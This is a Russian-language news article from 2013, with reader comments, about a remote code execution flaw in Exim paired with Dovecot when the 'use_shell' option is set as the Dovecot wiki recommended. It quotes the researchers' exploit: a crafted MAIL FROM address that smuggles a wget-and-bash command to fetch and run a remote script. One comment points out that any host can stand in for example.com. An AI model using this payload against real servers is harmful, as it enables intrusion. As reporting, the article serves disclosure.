Обнаружена критическая уязвимость в конфигурации Exim и Dovecot

image

Теги: Exim

При работе в связке с IMAP/POP3-сервером Dovecot и при их настройке согласно рекомендациям разработчиков возможно удаленное выполнение кода на сервере.

Согласно сообщению исследователей информационной безопасности из RedTeam Pentesting, им удалось обнаружить критическую уязвимость в почтовом сервере Exim, работающем в связке с IMAP/POP3-сервером Dovecot. Удаленный пользователь может выполнить произвольный код на сервере при условии, что работа данного ПО была сконфигурирована согласно рекомендациям на wiki-сайте проекта.

Для эксплуатации бреши злоумышленникам достаточно отправить на почтовый сервер письмо со специально сформированным адресом отправителя. В случае если в конфигурации Exim в блоке подключения Dovecot указана опция «use_shell», на системе будет выполнен помещенный в адрес код.

Стоит отметить, что на сегодняшний день данная конфигурация содержится во многих руководствах по настройке, поскольку впервые ошибочная опция была опубликована на официальном портале Dovecot еще в 2009 году.

В RedTeam Pentesting также предоставили пример эксплуатации бреши. При указании в качестве адреса отправителя «MAIL FROM: red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com» почтовый сервер выполнит команду «/bin/sh -c "/usr/lib/Dovecot/deliver -e -k -s -f \"red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com"», что свою очередь, приводит к запуску wget, а также к загрузке и выполнению внешнего скрипта c сайта example.com/test.sh. 


или введите имя

CAPTCHA
Ну да
06-05-2013 13:04:53
Всего-то осталось только получить доступ к сайту example.com, залить на него скрипт test.sh, и ключик у нас в кармане. Очень критическая
0 |
06-05-2013 17:47:50
Никто не мешает вместо example.com подставить свой ресурс
0 |
X3
06-05-2013 13:21:23
Не могу найти в конфигах exim и dovecot ничего похожего. В каком конфиге смотреть?
0 |
07-05-2013 10:48:55
Пальцем показываю для "особо внимательных" В случае если в конфигурации Exim в блоке подключения Dovecot указана опция «use_shell»,
0 |
X3
07-05-2013 13:12:23
В каком файле конфигурации? В exim.conf не вижу ничего похожего на параметры по ссылкам. Хотя exim используется в паре с dovecot.
0 |
07-05-2013 20:35:20
С чего Вы решили, что этот параметр обязательно должен быть? Если нет - то и слава Богу. Опять цитирую. Удаленный пользователь может выполнить произвольный код на сервере при условии, что работа данного ПО была сконфигурирована согласно рекомендациям на wiki-сайте проекта.
0 |